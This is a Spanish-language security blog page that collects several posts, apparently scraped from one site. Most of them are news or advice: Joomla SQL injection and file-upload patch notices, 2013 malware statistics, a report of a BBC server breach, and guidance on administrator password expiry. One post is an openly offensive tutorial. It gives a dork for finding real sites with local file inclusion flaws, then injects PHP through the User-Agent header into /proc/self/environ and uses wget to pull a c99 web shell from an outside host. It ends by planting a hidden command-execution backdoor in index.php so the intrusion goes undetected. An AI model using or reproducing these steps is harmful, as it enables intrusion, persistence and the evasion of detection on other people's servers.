Joomla 3.2: grave vulnerabilidad de SQL Injection (Parchea!)

<div style="text-align: justify;"> En febrero saltó a la palestra una <a href="http://www.securitybydefault.com/2014/03/analisis-de-inyeccion-sql-critica-en.html" rel="nofollow" target="_blank"><b>grave vulnerabilidad de inyección SQL</b></a> que afectaba al gestor de contenidos Joomla!, reportada por <a href="http://osvdb.org/creditees/12083-killall-9">killall-9.</a> En esta ocasión, y a diferencia de lo que suele siempre ocurrir, la vulnerabilidad residía en el núcleo de la aplicación y no en módulos o plugins. Por lo que <b>cualquier instalación de Joomla anterior a 3.2.2 es vulnerable por defecto</b>.</div> <div style="text-align: justify;">  </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo55eEVCLTu0JUq6iLE8FqOGwfu8C80AGX8oAwcv583UHrhJv5n6TlwALeed59HrgMQEYWf6qLzmSj3RLYSER5KZpjIYQWo7bTGWwioHSgj3t1QMSlWoBQ4xkVuspuyPss-YpQdxNp3uI/s1600/joomla-sqli-expl.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo55eEVCLTu0JUq6iLE8FqOGwfu8C80AGX8oAwcv583UHrhJv5n6TlwALeed59HrgMQEYWf6qLzmSj3RLYSER5KZpjIYQWo7bTGWwioHSgj3t1QMSlWoBQ4xkVuspuyPss-YpQdxNp3uI/s1600/joomla-sqli-expl.png" width="400" /></a></div> <br /> El equipo de desarrollo de Joomla! acaba de publicar dos nuevas versiones de su CMS para las ramas 2.5.x y 3.2.x. Ambas están catalogadas como actualizaciones de seguridad y es importante actualizar a la mayor brevedad. Para la rama 3.2 hay cuatro problemas de seguridad corregidos (uno de calificación alta de inyección SQL y tres de calificación media) además de unos 40 bugs corregidos; para la rama 2.5 hay 6 errores corregidos y 2 de seguridad de calificación media. <br /> <br /> Anuncio oficial y lista de cambios: <a href="http://www.joomla.org/announcements/release-news/5537-joomla-2-5-19-released.html" rel="nofollow" target="_blank">Joomla! 2.5.19</a> y <a href="http://www.joomla.org/announcements/release-news/5538-joomla-3-2-3-released.html" rel="nofollow" target="_blank">3.2.3</a><br /> <br /> Fuente: <a href="http://www.daboweb.com/2014/03/06/breves-disponibles-joomla-2-5-19-y-3-2-3-actualizaciones-de-seguridad/" rel="nofollow" target="_blank">Daboweb</a><div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

En febrero saltó a la palestra una grave vulnerabilidad de inyección SQL que afectaba al gestor de contenidos Joomla!, reportada por killa...

Leer más »

Retrospectiva 2013: la ciberseguridad en números

<div style="text-align: justify;"> El nivel global de ciberamenazas creció en 6.9 puntos porcentuales en 2013. A lo largo del año, el 41.6 % de las computadoras de consumidor fueron atacadas mínimo una vez. Para llevar a cabo estos ataques, los cibercriminales utilizaron 10,604,273 hosts únicos, un 60.5% más que en 2012.</div> <div style="text-align: justify;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLVul-zMb0hWOgCOOzXPBetscOTAS8iBn128zcFeskWNx30zIJ9V1Yc65B4ie55If451wjwUP9an0CGiV-TLdWT07d2GXfoW57dxZknDKcDWI4XDQkkmU_RfZaleNzEC5ye8R5objvBq1v/s1600/security.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLVul-zMb0hWOgCOOzXPBetscOTAS8iBn128zcFeskWNx30zIJ9V1Yc65B4ie55If451wjwUP9an0CGiV-TLdWT07d2GXfoW57dxZknDKcDWI4XDQkkmU_RfZaleNzEC5ye8R5objvBq1v/s400/security.jpg" width="400" /></a></div> <div style="text-align: justify;"> <br /> <br /> Asimismo, 2013 experimentó un incrementó en problemas de ciberseguridad en dispositivos móviles, con un nuevo nivel de madurez en términos de sofisticación y número de amenazas. La mayor parte de las aplicaciones móviles maliciosas están destinadas al robo de dinero y subsecuentemente, información personal. Android es el blanco principal, atrayendo el 98.5 % del malware móvil conocido.<br /> <br /> <a href="http://www.kaspersky.com/about/news/virus/2013/number-of-the-year" rel="nofollow" target="_blank">Kaspersky Lab reporta que detecta 315,000 archivos maliciosos</a> nuevos cada día. El año pasado el número fue de 200,000. Los productos de Kaspersy Lab repelieron en promedio 4,569,920 en computadoras de usuarios cada día mientras estaban en línea.<br /> <br /> El número de ataques basados en el navegador a lo largo de los dos últimos años se ha duplicado hasta 1,700,870,654 y Kaspersky detectó 104,427 modificaciones nuevas a programas maliciosos para dispositivos móviles, lo cual representa un incremento del 125 % más que el año pasado. El 90.52 % de todos los intentos detectados para explotar vulnerabilidades estaban destinados a Oracle Java.<br /> <br /> Los productos de Kaspersky Lab detectaron casi 3 billones de ataques de malware en computadoras de usuarios y un total de 1.8 millones de programas maliciosos fueron detectados en estos ataques.<br /> <br /> Fuente: <a href="http://www.cioal.com/2013/12/26/retrospectiva-2013-la-ciberseguridad-en-numeros/">CIOAL</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

El nivel global de ciberamenazas creció en 6.9 puntos porcentuales en 2013. A lo largo del año, el 41.6 % de las computadoras de consumido...

Leer más »

Hacker ruso entra en un servidor de la BBC

<div class="article-caption" style="text-align: justify;"> <h2> <span style="font-size: small;">Un hacker ruso mantuvo el control de uno delos servidores informáticos de la Corporación Británica de Radio BBC durante un tiempo y trató de vender el acceso a ese servidor a otros delincuentes cibernéticos.</span><br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSno6mc_LBMrNzWnSjgQGHO91P3j6OcwcOkd_9M1zRQUziHs8cZgocaiWwuQ77X2YaanHu6nmiGK3YuxFi6RdTKjM17B4UL_XZDttVlU9pVo9SzhY6Gd9yVMep_Ob3r_eQXxvBHUVHkRpS/s1600/BBC_Hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSno6mc_LBMrNzWnSjgQGHO91P3j6OcwcOkd_9M1zRQUziHs8cZgocaiWwuQ77X2YaanHu6nmiGK3YuxFi6RdTKjM17B4UL_XZDttVlU9pVo9SzhY6Gd9yVMep_Ob3r_eQXxvBHUVHkRpS/s400/BBC_Hacked.jpg" width="400" /></a></div> </h2> </div> <div id="p_10" style="text-align: justify;"> <span>Según informó la firma norteamericana Hold Security, sus colaboradores detectaron al hacker la semana pasada cuando alardeaba de su éxito en uno de los foros del mercado negro. Sin embargo se desconoce si logró vender la información antes de que la BBC reaccionara a la señal.</span></div> <div id="p_10" style="text-align: justify;"> <br /></div> <div id="p_20"> Los representantes de la BBC declararon que la Corporación no hace comentarios sobre preguntas de seguridad.</div> <div id="p_20"> </div> <div id="p_20"> <span id="ctrlcopy"></span></div> <div id="p_20"> </div> <div id="p_20"> </div> <div id="p_20"> <br /><span id="ctrlcopy"></span><span id="ctrlcopy"><a href="http://spanish.ruvr.ru/news/2013_12_31/Hacker-ruso-entra-en-un-servidor-de-la-BBC-8935/" target="_blank">Fuente</a></span></div>

Un hacker ruso mantuvo el control de uno delos servidores informáticos de la Corporación Británica de Radio BBC durante un tiempo y trat...

Leer más »

Cuentas de administrador con contraseña que no expira

<div style="text-align: justify;"> En una encuesta completamente no científica que realicé durante una presentación reciente de <i>TechEd</i>, pregunté cuanta gente que tiene credenciales de administración de dominio tienen también configurado su cuenta de administrador para que esté exenta de la política de contraseñas que requiere cambios periódicos.<br /> <br /> La respuesta fue una risa nerviosa.<br /> <br /> Mientras que algunas organizaciones tienen políticas estrictas respecto del cambio de contraseñas, el forzado de esas políticas a menudo es inconsistente. A menor tamaño del departamento de TI, menos probable que los usuarios privilegiados sean estrictos en adherir políticas de seguridad tales como cambiar regularmente la contraseña de las cuentas privilegiadas.</div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixC_oKHU6AlSkAeTaay2tzkJx7v_tEKrvlUidmPzGKW1zAADLeXnJKodDbpafVcuER0sGczSnu6Ib9kODI7HtsE9j-tpBt32GNa6TVg4_uBi7miRvTkTjtvG2eEh1KqGQlqMVr4rSI4oZa/s1600/AV_Bypass.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF45lkhA9E7sUvK0KzQIkL0KtlrDKyd5UWtFi6WWl_5XQNPyqk7Gs8cjcBk1X-KS_NLugMWWHNvFezwyrg08mFFI4reWh9ngUMETb9pro-likd2sZf7gjWXZWDK5PagQI4AF14CUZKHkql/s1600/Hacking+Etico.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF45lkhA9E7sUvK0KzQIkL0KtlrDKyd5UWtFi6WWl_5XQNPyqk7Gs8cjcBk1X-KS_NLugMWWHNvFezwyrg08mFFI4reWh9ngUMETb9pro-likd2sZf7gjWXZWDK5PagQI4AF14CUZKHkql/s400/Hacking+Etico.png" width="400" /></a></div> <div style="text-align: justify;"> <br /> <br /> ¿Porqué? Probablemente porque nadie salvo los propios administradores podrían percatarse que la política está siendo violada.<br /> <br /> En tanto continúe la tendencia inevitable de administradores únicos a manejar cada vez más computadoras, el tamaño del departamento de TI de muchas organizaciones se ha ido reduciendo. Mientras una compañía con 1500 personas hace diez años tendría un pequeño equipo de administradores, la misma compañía podría tener hoy uno o dos solamente.<br /> <br /> Con la reducción del tamaño de la administración viene la reducción de la supervisión entre pares. “<i>Quis custodiet ipsos custodes</i>” (<i>¿quien vigila a los vigilantes?</i>) es una pregunta fácil de responder cuando los vigilantes se controlan unos a otros, mucho menos fácil de responder si solo hay uno o dos vigilantes. Quizás en grandes equipos de TI son mejores con el auto-control cuando se trata de cumplimiento de políticas de seguridad sencillamente porque hay más presión entre pares.<br /> <br /> Si bien hay consultas que se pueden ejecutar en el Centro de Administración de Directorio Activo para determinar cuales cuentas no han cambiado recientemente su contraseña, esta no es una tarea que sea probable que la ejecute nadie fuera del equipo de administración.<br /> <br /> Mientras que algunos administradores pueden encogerse de hombros y decidir que si bien esa es una mala práctica, hay poco riesgo para ellos porque se aseguran que nadie los mire por encima del hombro cuando ingresan su contraseña. La realidad es que como el autor de ciencia ficción señala en un blog reciente (http://www.antipope.org/charlie/blog-static/2013/12/trust-me.html ), los <i>keyloggers</i> se están haciendo pequeños, pueden ser dispositivos USB pasantes e incluso pueden formar parte del propio teclado. A menos que un administrador verifique su computadora cada vez en busca de la presencia de tales dispositivos, alguien que trabaje en la misma organización podría poner tal dispositivo físicamente en la computadora del administrador (otro buen argumento para el doble factor de autenticación para las cuentas privilegiadas.)<br /> <br /> Al final de cuentas si uno selecciona la opción "la contraseña no expira nunca" eso depende de uno. Habilitándole se reduce la seguridad de su organización y con el advenimiento de cuentas de servicio administradas, hay menos razones para usar contraseñas estáticas con cualquier cuenta de usuario.<br /> <br /> <b>Traducción: <a href="https://twitter.com/rfb_">Raúl Batista</a> - <a href="http://www.segu-info.com.ar/">Segu-Info</a></b><br /> Autor: <a href="http://windowsitpro.com/blogger/orin-thomas"><b>Orin Thomas</b></a><br /> Fuente: <a href="http://windowsitpro.com/blog/administrator-accounts-passwords-dont-expire"><b>Windows IT Pro</b></a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

En una encuesta completamente no científica que realicé durante una presentación reciente de TechEd , pregunté cuanta gente que tiene cred...

Leer más »

WordPress 3.8, grandes cambios de diseño y uso en dispositivos móviles

<div style="text-align: justify;"> Y reseñamos los cambios estéticos de esta nueva versión de<b> <a href="http://wordpress.org/news/2013/12/parker/" rel="nofollow" target="_blank">WordPress 3.8 "Parker"</a></b>, (panel de administración, tipografías, nuevo tema por defecto estilo “magazine”, iconos, etc), ya que a nivel de seguridad no se ha proporcionado ninguna información por parte de WordPress.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji1lXx-Yvi0fk24fsf-57oe5NtPButo_ZUbgnpd4LQohxwPx3vvRIo41LRTE-4o0tp5HUoWQvAnNphZzaG27TQAEq2l5l8q9ZmDeJEhhNBAVNZkiDNXM7aBT-9l8X4vsXI8Yi5TBw0-B6m/s1600/WordPress-Logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji1lXx-Yvi0fk24fsf-57oe5NtPButo_ZUbgnpd4LQohxwPx3vvRIo41LRTE-4o0tp5HUoWQvAnNphZzaG27TQAEq2l5l8q9ZmDeJEhhNBAVNZkiDNXM7aBT-9l8X4vsXI8Yi5TBw0-B6m/s320/WordPress-Logo.png" width="320" /></a></div> <div style="text-align: justify;"> <br /> <br /> Pero viendo los tickets cerrados <a href="http://core.trac.wordpress.org/timeline" rel="nofollow" target="_blank">en el trac</a>, os <b>recomendamos actualizar ya</b>, ante posibles futuras vulnerabilidades respecto a versiones anteriores en los próximos días.<br /> Cabe destacar el esfuerzo realizado para la<b> adaptación a cualquier tipo de dispositivo</b>, con especial énfasis en los móviles y tablets, por lo que la publicación será más ágil y rápida desde cualquier lugar.<br /> <br /> Fuente: <a href="http://www.daboweb.com/2013/12/12/liberado-wordpress-3-8-con-grandes-cambios-de-diseno/" rel="nofollow" target="_blank">Daboweb</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

Y reseñamos los cambios estéticos de esta nueva versión de WordPress 3.8 "Parker" , (panel de administración, tipografías, nue...

Leer más »

Explotar LFI, Subir Shell Explotando /proc/self/environ y Backdorizar

<div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPjYRZ61rGvGwOF7MAtpJ3c0R9vA6tqV-ET8FbWe3Cqpv7mWJymo61r_66HsREkLNDCUopUNKSGOffxBueRqPLfA4MlRl-cLT8rXqvKMyMMoENYz_HtDh6ynJ8Co8cxT9J8KPWs__eLYYF/s1600/bender_applause.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPjYRZ61rGvGwOF7MAtpJ3c0R9vA6tqV-ET8FbWe3Cqpv7mWJymo61r_66HsREkLNDCUopUNKSGOffxBueRqPLfA4MlRl-cLT8rXqvKMyMMoENYz_HtDh6ynJ8Co8cxT9J8KPWs__eLYYF/s1600/bender_applause.png" /></a></div> Intrusion LFI php://input<br />tutorial de otro metodo para conseguir subir una shell por medio de LFI<br />utilizando inyecciones de codigo en php atraves de una vulnerabilidad en el /proc/self/environ<br /><br />Empecemos:<br /><br />Primero Buscamos con un dork alguna web Vulnerable a LFI<br /><br />Dork:<br /><br />inurl:*.php?page=* site:.com.co<br /><br />Vamos probando hasta encontrar una q al incluir /etc/passwd nos muestra su contenido<br />En este caso:<br /><br />http://sitiovulnerable/index.php?page=/etc/passwd<br /><br />Damos como parametro a incluir /proc/self/environ y vemos el siguien resultado<br /><br />http://sitiovulnerable/index.php?page=/proc/self/environ<br /><br /><br />Nos vamos a Mozilla Firefox y abrimos el addon Tamper Data:<br /><br />Damos clik en Start Tamper y volvemos a realizar la Peticion al sitio web<br /><br /><br />Desactivamos la casilla "Continue Tampering" y Damos Click en Tamper, modificamos el Parametro User-Agent intrudiciendo algun Codigo php, de Prueba, Yo intentare con <? System('ls'); ?> para ver si logramos listar el contenido de host.<br /><br /><br /><br />Damos Click en OK y vemos q el codigo php se ejecuta correctamente y lista los archivos y directorios de la web Vulnerable:<br /><br /><br /><br />Ahora Sabemos que se puede ejecutar Codigo Shell atraves de php con el comando system,exec,etc (si no funcionace reciviriamos un mensaje diciendo q la funcion system() a sido deshabilitada por razones de seguridad)<br /><br />Subiremos Nuestra Shell, de la siguiente forma.<br /><br />Abriremos Tamper Data y comensaremos a Capturar.<br />Repetiremos la Peticion al host:<br />http://sitiovulnerable/index.php?page=/proc/self/environ<br />Modificaremos el Parametro User-Agent para que ejecute Wget y descarge una shell en txt de donde sea que este alojada con el siguiente codigo php<br /><br /><? system('wget http://SitioDeLaShell/shell.txt'); ?><br /><br /><br /><br />Repetimos la Operacion Con Tamper Data y Comprobamos q nuestra shell se subio correctamente pasando como parametro en User-Agent<br /><br /><? system('ls'); ?><br /><br />Vemos que dentro de la lista de archivos del host aparece nuestra shell<br /><br /><br /><br />Convertiremos Nuestro txt, en un archivo php, repitiendo la operacion con Tamper Data y pasando como Parametro de User-Agent<br /><br /><? system('mv c99.txt s.php'); ?><br /><br />Una ves Hecho Esto repetimos el procedimiento con tamper data para listar nuestros archivos, para ver si el proceso anterior Termino Correctamente:<br /><br /><? system('ls'); ?><br /><br /><br /><br />Como vemos el archivo fue Renombrado Correctamente, solo nos queda vistar nuestro archivo por medio de la URL<br /><br />http://sitiovulerable/s.php<br /><br /><br /><br />Como vemos la ejecucion de la shellphp, se ejecuto Correctamente. Como es un Sitio Importante y no queremos q nos detecten, introduciremos un backdoor dentro del codigo de algun archivo, yo elegi index.php<br /><br /><br /><br />Les Dejo el code del backdoor que arme:<br /><br /><?php<br />if($_GET['active']=='si'){<br />system( $_GET['c']);<br />}<br />?><br /><br />Lo Introduciremos dentro de index.php y al llamarlo desde<br /><br />http://SitioVulnerable/index.php?c=ls&active=si<br /><br />nos mostrara el resultado de la ejecucion del parametro q pasemos.<br /><br /><br /><br />Solo nos queda Eliminar s.php con el comando rm s.php por medio de nuestro backdoor<br /><br />http://SitioVulnerable/index.php?c=rm s.php&active=si<br /><br />Listamos el Contenido del Host<br /><br />http://SitioVulnerable/index.php?c=ls&active=si

Intrusion LFI php://input tutorial de otro metodo para conseguir subir una shell por medio de LFI utilizando inyecciones de codigo en php ...

Leer más »

Evasión de restricciones en la subida de archivos de Joomla (Parchea!)

<div style="text-align: justify;"> El equipo de Joomla, el popular CMS libre escrito en PHP, <a href="http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/">ha corregido un error</a> que permitía a un usuario, con los permisos correspondientes, <a href="http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads">subir un archivo con cualquier extensión</a>.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHtuAwHepq0isYf7uZK8g1-ozp4P7zvMarPPHjpm7Km2AY3YYQ0LoLH0c2S-aBcvXmIaihLv3HSlSemx40LyjhUmM8MD1hgkSwIH5vCldJ9G8TDqx1rTqwKjYWw3BVYylU3E3v-IE8Ombu/s1600/joomla_Parchea.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="349" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHtuAwHepq0isYf7uZK8g1-ozp4P7zvMarPPHjpm7Km2AY3YYQ0LoLH0c2S-aBcvXmIaihLv3HSlSemx40LyjhUmM8MD1hgkSwIH5vCldJ9G8TDqx1rTqwKjYWw3BVYylU3E3v-IE8Ombu/s400/joomla_Parchea.png" width="400" /></a></div> <div style="text-align: justify;"> <br /> <br /> La funcionalidad de subida de archivos a Joomla restringe el tipo de los archivos en base a una lista blanca. Por ejemplo, un usuario podría subir archivos del tipo jpeg, pdf, xls, etc, pero por otro lado no estaría permitida la subida de archivos que contuvieran código PHP. Para impedir esto en esa lista blanca se excluyen extensiones como ‘.php’.<br /> <br /> El problema reside en que la función que comprueba esto no tiene en cuenta extensiones nulas, es decir, extensiones que solo tengan el '.'.<br /> <br /> Veamos el código de 'libraries/joomla/filesystem/file.php'.<br /> <br /> La función miembro que obtiene las extensiones de la clase JFile:<br /> <code><br /> public static function getExt($file)<br /> {<br /> $dot = strrpos($file, '.') + 1;<br /> <br /> return substr($file, $dot);<br /> }<br /> </code><br /> 'strrpos' es una función que busca la última ocurrencia de una subcadena dentro de una cadena o lo que es lo mismo (y más eficiente): busca la primera ocurrencia de una subcadena en una cadena comenzando desde el final hasta el principio.<br /> <br /> Ante un archivo denominado <i>'shell.php.'</i> el valor de la variable 'dot' valdrá 10 ya que la cadena termina con un punto.<br /> <br /> La función miembro termina retornando el valor de la función 'substr'. Esta función retorna una subcadena correspondiente a la cadena 'file' desde la posición 'dot'. Como sabemos que 'dot' vale 10 y la cadena 'file' tiene como longitud 10 lo que retornará la función será una cadena vacía.<br /> <br /> Si ahora observamos el código sin parchear del archivo <i>'/administrator/components/com_media/helpers/media.php'</i>:<br /> <code><br /> $format = strtolower(JFile::getExt($file['name']));<br /> <br /> $allowable = explode(',', $params->get('upload_extensions'));<br /> $ignored = explode(',', $params->get('ignore_extensions'));<br /> if (!in_array($format, $allowable) && !in_array($format, $ignored))<br /> {<br /> $err = 'COM_MEDIA_ERROR_WARNFILETYPE';<br /> return false;<br /> }<br /> </code><br /> <br /> En la primera linea, con nuestra cadena <i>'shell.php.'</i>, sabemos que retornará falso:<br /> <code><br /> $format = strtolower(JFile::getExt($file['name']));<br /> </code><br /> <br /> Posteriormente dicho valor se usará en la comparación:<br /> <code><br /> if (!in_array($format, $allowable) && !in_array($format, $ignored))<br /> </code><br /> <br /> Esto quiere decir que si de dan las dos condiciones entonces y solo entonces se provocará un error en la subida de archivos y se abortará la operación.<br /> <br /> La primera expresión retornará 'true' ya que la cadena vacía no forma parte de las extensiones permitidas y el 'false' está negado. La segunda parte, y aquí viene lo ingenioso, es que estamos buscando la cadena vacía en un array vacío. Esto es debido a que Joomla no tienen extensiones ignoradas por defecto y por lo tanto dicha función retornará 'true', pero como estamos negando el valor, finalmente lo convertimos a 'false' y con esto hemos evadido la restricción, ya que siendo un AND se deberían haber evaluado las dos condiciones a 'true'.<br /> <br /> <b>El fallo ha sido corregido y afectaría a las versiones anteriores a la 2.5.13 inclusive de la rama 2.5 y anteriores a la 3.1.4 también inclusiva.</b> El CVE está pendiente de su publicación.<br /> <br />Fuente: <a href="http://unaaldia.hispasec.com/2013/08/evasion-de-restricciones-en-la-subida.html" target="_blank">Hispasec</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

El equipo de Joomla, el popular CMS libre escrito en PHP, ha corregido un error que permitía a un usuario, con los permisos correspondient...

Leer más »